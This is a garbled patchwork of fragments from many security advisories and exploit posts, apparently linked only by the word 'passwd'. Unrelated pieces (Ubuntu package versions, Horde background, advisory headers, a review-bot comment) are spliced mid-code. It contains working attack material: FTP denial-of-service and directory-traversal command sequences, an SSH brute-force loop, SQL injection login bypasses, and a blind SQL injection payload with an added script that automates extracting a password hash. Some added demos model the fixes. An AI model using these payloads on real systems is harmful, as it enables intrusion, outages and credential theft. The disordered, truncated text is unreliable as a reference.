passwd
If you could log on to the server successfully, take the following steps and the FTP server will stop responding:
first socket connection:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" % username)
3. sock.send("pass %s\r\n" % passwd)
4. sock.send("PORT 127,0,0,1,122,107\r\n")
5. sock.send("APPE " + test_string + "\r\n")
6. sock.close()
second socket connection:
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
passwd 1:4.0.13-7ubuntu3.3
Ubuntu 7.10:
passwd 1:4.0.18.1-9ubuntu0.1
Ubuntu 8.04 LTS:
Denial of Service attack:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" % username)
3. sock.send("pass %s\r\n" % passwd)
4. sock.send("PORT 127,0,0,1,122,107\r\n")
5. sock.send("APPE " + test_string + "\r\n")
6. sock.send("DELE " + test_string + "\r\n")
7. sock.close()
will stop service:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" % username)
3. sock.send("pass %s\r\n" % passwd)
4. for i in range(1, 20):
       sock.send("SITE INDEX " + "a"*30*i + "\r\n")
5. sock.close()
Background
==========
Horde is a web application framework written in PHP. Horde IMP, the
"Internet Messaging Program", is a Webmail module and Horde Passwd is a
password changing module for Horde.
Affected packages
=================
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
"MKD ../A" to create a folder named "A" outside the FTP root directory.
If you could log on to the server successfully, take the following steps to create directories outside the FTP root directory:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" % username)
3. sock.send("pass %s\r\n" % passwd)
4. sock.send("MKD ../A\r\n")
5. sock.close()
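The PORT argument used in the DoS steps above (127,0,0,1,122,107, i.e. a data connection to 127.0.0.1 port 122*256+107 = 31339) and the "MKD ../A" traversal are both things an FTP server should refuse before acting on them: RFC 2577 recommends rejecting active-mode data connections to any address other than the control peer or to a privileged port, and every path argument has to be resolved against the FTP root before it touches the filesystem. The following is an added example of those two server-side checks, written for this page and not taken from any of the FTP servers discussed; the peer address, the FTP root and the function names are assumptions.

```python
import ipaddress
import posixpath

# Constructed for this example: the address the control connection came from
# and the server's FTP root. Neither is taken from the advisory text.
SAMPLE_PEER = "192.0.2.10"
SAMPLE_ROOT = "/srv/ftp"


def parse_port(arg):
    """Parse the FTP PORT argument h1,h2,h3,h4,p1,p2 into (ip, port).
    Raises ValueError on anything that is not six decimal octets."""
    fields = arg.strip().split(",")
    if len(fields) != 6:
        raise ValueError("PORT needs six comma-separated fields")
    nums = []
    for f in fields:
        if not f.isdigit() or int(f) > 255:
            raise ValueError("PORT field %r is not an octet" % f)
        nums.append(int(f))
    return ".".join(str(n) for n in nums[:4]), nums[4] * 256 + nums[5]


def port_is_acceptable(arg, peer_ip):
    """RFC 2577 style acceptance test for an active-mode data connection:
    refuse loopback/unspecified/multicast targets, any address other than
    the control connection's peer, and privileged ports. Returns (ok, reason)."""
    try:
        ip, port = parse_port(arg)
    except ValueError as err:
        return False, str(err)
    addr = ipaddress.ip_address(ip)
    if addr.is_loopback or addr.is_unspecified or addr.is_multicast:
        return False, "refusing data connection to %s" % ip
    if ip != peer_ip:
        return False, "PORT address %s is not the control peer %s" % (ip, peer_ip)
    if port < 1024:
        return False, "refusing privileged data port %d" % port
    return True, "ok"


def resolve_inside_root(root, cwd, arg):
    """Resolve a client path argument (MKD, APPE, DELE, ...) against the FTP
    root and the session's current directory, refusing anything that would
    leave the root. Purely lexical: pair it with chroot() or a realpath()
    check if symlinks can exist under the root. Returns the path or None."""
    root = posixpath.normpath(root)
    if arg.startswith("/"):
        candidate = posixpath.join(root, arg.lstrip("/"))
    else:
        candidate = posixpath.join(root, cwd.lstrip("/"), arg)
    candidate = posixpath.normpath(candidate)
    # separator-aware prefix test so that /srv/ftp-evil does not match /srv/ftp
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    # the PORT argument and the MKD argument quoted in the advisory above
    print(port_is_acceptable("127,0,0,1,122,107", SAMPLE_PEER))
    print(resolve_inside_root(SAMPLE_ROOT, "/", "../A"))
```

Both functions are lexical checks on the command arguments only; a server that also chroots into the FTP root, or calls realpath() on the resolved candidate, closes the symlink case that the prefix test cannot see.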
Severity:
High
if len(sys.argv) < 4:   # server, user and password are all required
    usage()
    sys.exit(1)
ftpserver = sys.argv[1]
user = sys.argv[2]
passwd = sys.argv[3]
print "Connecting to "+ftpserver+" using "+user+"....",
# Try opening a connection to the FTP server
try:
Let's see the details.
- PHP filesystem functions path normalization attack
PHP normalizes / and /. in path names, allowing for example /etc/passwd/ or /etc/passwd/. to be successfully opened as a file.
- PHP filesystem functions path truncation attack
PHP has a path truncation issue (a badly implemented snprintf()) allowing only MAX_PATH chars to be evaluated when actually opening a
# otherwise exploit could become less reliable.
# So let's rm some junk before exploiting our app...
for (my $count = 30; $count >= 1; $count--) {
    my $ssh2 = Net::SSH2->new();
    $ssh2->connect($ip, $port) || die "[-] Connection Failed!";
    $ssh2->auth_password($user, $pass) || die "Wrong Username or Passwd!";
    $ssh2->disconnect();
}
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connection Failed!";
$ssh2->auth_password($user, $pass) || die "Wrong Username or Passwd!";
----------------
Publication :11/02/2008
----------------
Affected Software : IPDiva VPNSSL
Versions :
Users who authenticate with login and password, without an OTP system
* 2.2 branch < 2.2.8.84
* 2.3 branch < 2.3.2.14
-------------------
Vulnerability : Brute force attack
TPTI-09-08: HP OpenView NNM ovlogin.exe CGI userid/passwd Heap Overflow Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-09-08
December 9, 2009
-- CVE ID:
CVE-2009-3846
-- Affected Vendors:
Hewlett-Packard
line 29:
$passwd = md5($_POST[userPassword]); // md5 hash password
if($_POST[userType] != 'Staff')
{$sql = "SELECT userID, userName
FROM user_account
WHERE userAccount='$_POST[userAccount]' AND
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string='a'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
> and a password of "1" (without quotes).
>
> which leads to a successful login. Different account logins can be made successful using the limit clause (e.g. appending "LIMIT 5,1" will make you log in as the 5th account in the users table).
>
> As far as I can see in the mysql logs the query becomes:
> SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1
I can see proper escaping even when varying the SQL code provided. Here
the MySQL log excerpt:
SELECT username, password, uid, gid, homedir, shell FROM ftp WHERE
(username='USER%\') and 1=2 union select 1,1,uid,gid,homedir,shell from
The attack is enabled by two factors:
1. The newline character (ASCII 0x0A) is allowed in user passwords.
2. The *NIX connectors use a send/expect technique to interact with the 'passwd' program but fail to handle passwords containing newline characters.
In the process of changing the user password to a value containing a newline, the interaction between the IDM connector and the UNIX shell goes out of sync and the password gets executed by the UNIX shell running as root.
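The desynchronisation described above is easy to reproduce with a model: a connector that types the new password into an interactive passwd session, and a shell that consumes whatever it is given line by line. The following is an added example for this page, not the vendor's connector code; the fake shell, the connector functions and the sample password are constructed for the demonstration.

```python
LINE_TERMINATORS = ("\n", "\r", "\x00")


def password_is_safe_for_send_expect(pw):
    """A password that an interactive passwd session can consume as one
    line: no newline, carriage return or NUL. Anything after such a byte
    is delivered as the next line and reaches whatever prompt is waiting."""
    return not any(t in pw for t in LINE_TERMINATORS)


class FakeRootShell:
    """Stand-in for the root shell a connector drives over SSH or telnet
    (constructed for this example). It consumes input line by line: while
    'passwd' is prompting, a line is taken as the password; otherwise it is
    run as a command."""

    def __init__(self):
        self.executed = []        # commands the shell "ran" as root
        self.password_lines = []  # what passwd received at its two prompts
        self._prompts_pending = 0
        self._buf = ""

    def send(self, text):
        # a pty hands the program complete lines; keep any partial line buffered
        self._buf += text
        while "\n" in self._buf:
            line, self._buf = self._buf.split("\n", 1)
            self._feed_line(line)

    def _feed_line(self, line):
        if self._prompts_pending:
            self._prompts_pending -= 1
            self.password_lines.append(line)
        elif line.startswith("passwd "):
            self._prompts_pending = 2   # "New password:" and "Retype new password:"
        elif line.strip():
            self.executed.append(line)


def naive_change_password(shell, user, new_pw):
    """What the vulnerable send/expect logic amounts to: type the command,
    then the new password twice, each terminated by a newline. Nothing
    here checks that the password really is a single line."""
    shell.send("passwd %s\n" % user)
    shell.send(new_pw + "\n")
    shell.send(new_pw + "\n")
    return shell


def hardened_change_password(shell, user, new_pw):
    """Refuse to drive passwd interactively with a multi-line value."""
    if not password_is_safe_for_send_expect(new_pw):
        raise ValueError("password contains a line terminator; refusing to type it")
    return naive_change_password(shell, user, new_pw)


if __name__ == "__main__":
    # constructed malicious password: one line for passwd, one for the shell
    shell = naive_change_password(FakeRootShell(), "alice", "x\nid > /tmp/pwned")
    print("passwd saw:", shell.password_lines)
    print("shell ran as root:", shell.executed)
```

With the injected value the two passwd prompts are satisfied by the first send alone, so the second copy of the password arrives at the shell prompt and is executed. Rejecting line terminators before anything is typed is the minimal fix; a connector that can avoid the interactive session entirely (for example by calling a library API) removes the send/expect parsing problem altogether.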
...
function SEC_authenticate($username, $password, &$uid)
{
global $_CONF, $_TABLES, $LANG01;
$result = DB_query("SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))"); //<------------------- SQL INJECTION HERE
$tmp = DB_error();
$nrows = DB_numRows($result);
if (($tmp == 0) && ($nrows == 1)) {
$U = DB_fetchArray($result);
which leads to a successful login. Different account logins can be made successful using the limit clause (e.g. appending "LIMIT 5,1" will make you log in as the 5th account in the users table).
As far as I can see in the mysql logs the query becomes:
SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1
I think the problem lies in the handling of the "%" character (probably that's some way to sanitize input to avoid format string things?).
Anyway, %' effectively makes the single quote unescaped and that eventually allows for an SQL injection during login.
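The ordering bug suspected in the message above can be modelled in a few lines: the backend escapes the quote in the username, then runs a tag resolver over the assembled clause, and the resolver consumes the backslash as part of an unknown "%" tag. The following is an added model written for this page, not the FTP server's SQL backend; the tag table is invented, the "{UNKNOWN TAG}" marker is taken from the logged query, and the payload is the one reconstructed from that log.

```python
import re

# Tag letters the backend knows; constructed for this model, not the server's real set.
KNOWN_TAGS = {"%u": "<client-username>", "%h": "<client-host>"}
TEMPLATE = "(userid='{value}') LIMIT 1"


def escape_quotes(value):
    """MySQL-style escaping: backslash before backslash and single quote."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def resolve_tags(text):
    """Expand every two-character '%X' sequence; unknown letters become the
    literal '{UNKNOWN TAG}' marker seen in the logged query above."""
    return re.sub(r"%.", lambda m: KNOWN_TAGS.get(m.group(0), "{UNKNOWN TAG}"), text)


def vulnerable_where(username):
    """Escape first, then resolve tags over the assembled clause. A username
    containing %' is escaped to %\\' and the resolver then consumes the
    pair %\\ as an unknown tag, leaving the quote bare."""
    return resolve_tags(TEMPLATE.format(value=escape_quotes(username)))


def hardened_where(username):
    """Resolve tags in the template only, then splice in the escaped value,
    so user data never reaches the tag resolver. (A parameterised query
    would remove the string assembly entirely.)"""
    return resolve_tags(TEMPLATE).replace("{value}", escape_quotes(username))


def unescaped_quote_count(clause):
    """Single quotes not preceded by a backslash; an odd count means the
    string-literal structure of the clause has been broken."""
    return len(re.findall(r"(?<!\\)'", clause))


if __name__ == "__main__":
    # the username reconstructed from the logged query above
    payload = "%') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- "
    print(vulnerable_where(payload))
    print(hardened_where(payload))
```

Run against the reconstructed username, vulnerable_where() reproduces the logged clause character for character, with three unescaped quotes; hardened_where() leaves the backslash in place and the clause balanced.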
# ----------------------
from ftplib import FTP
import time
ip="127.0.0.1"
login="anonymous"
passwd = 'gorion@scriptkiddie.pl'
print '-------------------------------'
print '| HOME FTP SERVER DoS Exploit |'
print '| bY 0in From Dark-Coders! |'
print '|>>http://dark-coders.4rh.eu<<|'
print '-------------------------------'
Something (signup for ex.) --> column: Alias
Or...
./../../../etc/passwd --> column: Dateiname
Something (signup for ex.) --> column: Alias
Then, we go to:
There's a funny bug in the Novell client: a while ago a stack-based overflow was present in the username field.
This has been patched, but I guess not properly.
You have a username field limited to 255 chars, but when you fill up this field and press the login button
it tells you "not logged in".
If you click on the "forgot passwd" link, it will pop up a little window with the username you supplied printed;
a stack-based overflow occurs here, allowing code execution.
=====
> #9 Telnet service enabled by default
Anyone on the LAN is able to log in using the default admin:admin account with root privileges. There is no possibility to change this password (sic!)
You can change the telnet admin password on this device.
1. telnet in as admin with password admin
2. type: nvram set admin_passwd=SOMESTRONGPASSWD <enter>
3. type: nvram commit <enter>
4. restart the router (by switching off the power)
That's all.
traverse directories and include any given PHP file within the system, leading to a local file inclusion attack.
Note: Omitting the '.php' extension (to include an arbitrary file like /etc/passwd) by using a NULL character will not be possible in this case, as a %00 in the REQUEST_URI will not be decoded by the web server automatically, and there is no urldecode() call to decode it before the require_once call either.
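The two PHP behaviours listed earlier on this page (trailing "/" and "/." being normalised away, and the path being cut at MAX_PATH before the open) and the %00 note just above all act on the same pattern, require_once($base . $name . '.php'). The following is an added model for this page, not PHP's own code or the application's: it shows why "/etc/passwd/." alone does not shed the appended extension, why padding the path past the buffer limit does, why a literal %00 achieves nothing unless something decodes it first, and what a hardened include looks like. The include directory, the 4096-byte limit and the function names are assumptions.

```python
import posixpath
import re

MAXPATHLEN = 4096                         # PHP's MAXPATHLEN on a typical Linux build (assumed)
INCLUDE_BASE = "/var/www/app/modules/"    # the application's include directory (assumed)
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def php_style_open_path(path):
    """Model (not PHP's code) of the behaviours described on this page:
    1. a NUL byte terminates the C string, dropping everything after it;
    2. the path is truncated to MAXPATHLEN characters before use;
    3. trailing '/' and '/.' are normalised away, so '/etc/passwd/.' and
       '/etc/passwd/' both open '/etc/passwd';
    4. the OS resolves '..' components."""
    path = path.split("\x00", 1)[0]
    path = path[:MAXPATHLEN]
    while len(path) > 1 and (path.endswith("/") or path.endswith("/.")):
        path = path[:-1] if path.endswith("/") else path[:-2]
    return posixpath.normpath(path)


def vulnerable_include(user_value, url_decoded=False):
    """require_once($base . $_GET['m'] . '.php') as modelled above.
    url_decoded=True models a front end that decodes %00 before the include;
    the advisory's case is url_decoded=False, where '%00' stays literal."""
    if url_decoded:
        user_value = user_value.replace("%00", "\x00")
    return php_style_open_path(INCLUDE_BASE + user_value + ".php")


def hardened_include(user_value):
    """Allow only a plain module name and confirm the result still sits
    directly inside the include directory. Returns the path or None."""
    if not SAFE_NAME.fullmatch(user_value):
        return None
    base = posixpath.normpath(INCLUDE_BASE)
    candidate = posixpath.normpath(posixpath.join(base, user_value + ".php"))
    if posixpath.dirname(candidate) != base or not candidate.endswith(".php"):
        return None
    return candidate


def truncation_payload(target="/etc/passwd", depth=4):
    """Traverse out of INCLUDE_BASE, then pad with '/.' until the appended
    '.php' falls off the end of the MAXPATHLEN buffer."""
    stem = "../" * depth + target.lstrip("/")
    padding = "/." * ((MAXPATHLEN - len(INCLUDE_BASE) - len(stem)) // 2 + 8)
    return stem + padding


if __name__ == "__main__":
    print(vulnerable_include("../../../../etc/passwd/."))       # extension survives
    print(vulnerable_include(truncation_payload()))              # /etc/passwd
    print(vulnerable_include("../../../../etc/passwd%00"))       # literal %00, no effect
    print(vulnerable_include("../../../../etc/passwd%00", True)) # decoded: /etc/passwd
    print(hardened_include(truncation_payload()))                # None
```

The allow-list in hardened_include() does the real work; the dirname check is a second line of defence in case the naming rule is later loosened. Note that the model is lexical, so the padded payload works against it regardless of whether the files exist, exactly as the truncation attack does not care about intermediate directories.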
to perform a full upgrade at this time.
One sample attack string might look similar to the following:
'+(SELECT
IF(SUBSTRING(passwd,1,1)=CHAR(48),BENCHMARK(1000000,SHA1(1)),0) passwd
FROM ost_staff where staff_id=1) and '1'='1
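The attack string above is one probe of a time-based blind SQL injection: the injected IF() runs BENCHMARK() only when the guessed character of the stored hash matches, so the response time is the oracle. The following is an added example for this page, not osTicket's code or the advisory author's tool: it builds that probe for an arbitrary position and character, and drives the extraction against a simulated target that parses the probe and reports the delay a real server would show. The stored md5 hash, the timing threshold and the simulated response times are constructed.

```python
import re

HEX_ALPHABET = "0123456789abcdef"   # md5 hex digits, the form of hash assumed here
SLOW_SECONDS = 1.0                  # threshold separating "BENCHMARK ran" from "did not"


def build_payload(position, guess, cost=1000000):
    """Reproduce the structure of the attack string above for one
    (position, character) guess: BENCHMARK() runs only when the guess matches."""
    return ("'+(SELECT IF(SUBSTRING(passwd,%d,1)=CHAR(%d),BENCHMARK(%d,SHA1(1)),0) passwd "
            "FROM ost_staff where staff_id=1) and '1'='1" % (position, ord(guess), cost))


def extract_hash(send, length=32, alphabet=HEX_ALPHABET):
    """Recover the hash one character at a time. send(payload) returns the
    response time in seconds; a slow response means the guess was right."""
    recovered = []
    for pos in range(1, length + 1):
        for ch in alphabet:
            if send(build_payload(pos, ch)) >= SLOW_SECONDS:
                recovered.append(ch)
                break
        else:
            raise RuntimeError("no character matched at position %d" % pos)
    return "".join(recovered)


class SimulatedTarget:
    """Stand-in for the vulnerable page (constructed for this example). It
    parses the injected IF() out of the payload and returns the response
    time a real server would show, without actually sleeping."""
    PATTERN = re.compile(r"SUBSTRING\(passwd,(\d+),1\)=CHAR\((\d+)\)")

    def __init__(self, stored_hash):
        self.stored_hash = stored_hash
        self.requests = 0

    def send(self, payload):
        self.requests += 1
        m = self.PATTERN.search(payload)
        if not m:
            return 0.05
        pos, code = int(m.group(1)), int(m.group(2))
        matched = pos <= len(self.stored_hash) and self.stored_hash[pos - 1] == chr(code)
        return 2.3 if matched else 0.05   # BENCHMARK(1000000, SHA1(1)) versus an instant reply


if __name__ == "__main__":
    target = SimulatedTarget("5f4dcc3b5aa765d61d8327deb882cf99")   # md5("password"), constructed
    print(extract_hash(target.send), "recovered in", target.requests, "requests")
```

Against a real target the send() function would issue the HTTP request and time it, and the loop would need repeated measurements per guess to ride out network jitter; a binary search on the character code (SUBSTRING(...) > CHAR(n)) cuts the request count from up to sixteen per position to four.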
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
+ (statbuf.st_mode & 022) == 0) {
+ if (CGIG(suexec_base_dir) && !strncmp(real_path, CGIG(suexec_base_dir), strlen(CGIG(suexec_base_dir)))) {
+ path_ok = 1;
+ }
+ if (!path_ok && CGIG(suexec_user_dir)) {
+ struct passwd* pw = getpwuid(geteuid());
+ size_t len = strlen(pw->pw_dir) + 1 + strlen(CGIG(suexec_user_dir)) + 2;
+ char * user_dir = malloc(len);
+ strcpy(user_dir, pw->pw_dir);
+ strlcat(user_dir, "/", len);
+ strlcat(user_dir, CGIG(suexec_user_dir), len);
}
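Review bot: the new user-dir branch dereferences two unchecked pointers: `struct passwd* pw = getpwuid(geteuid());` can return NULL (no passwd entry for the effective uid, for example inside a minimal chroot or when the NSS lookup fails) and `char * user_dir = malloc(len);` can return NULL, yet the next line is `strcpy(user_dir, pw->pw_dir);`; test both and leave path_ok at 0 on failure. The base-dir test in the preceding if is a bare prefix match, `!strncmp(real_path, CGIG(suexec_base_dir), strlen(CGIG(suexec_base_dir)))`, so a suexec_base_dir of /home/www also accepts /home/www-evil/script; require the byte following the prefix in real_path to be '/' or NUL. Within the visible lines the malloc'd user_dir is never freed.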
the last step in the curl_init() function will only copy file://safe_mode_bypass to urlcopy.
The main problem is in the php_url_parse_ex() function. If you pass "file://host/somewhere/path.php" to curl_init(), php_url_parse_ex() puts /somewhere/path.php into the path variable. That looks fine, but it breaks down when the real path is checked: file:///etc/passwd is a correct URL, but between file:// and /etc/passwd php_url_parse_ex() picks a host component and returns the path as /passwd.
Tested in PHP 5.2.4 and PHP 5.2.5 (FreeBSD 6.2R)
cxib# php -v
PHP 5.2.5 with Suhosin-Patch 0.9.6.2 (cli) (built: Dec 10 2007 19:54:41) (DEBUG)
Complete these steps:
1. Change the root password by using the following command:
shell# passwd
2. Reboot to activate the new settings by using the following command:
shell# reboot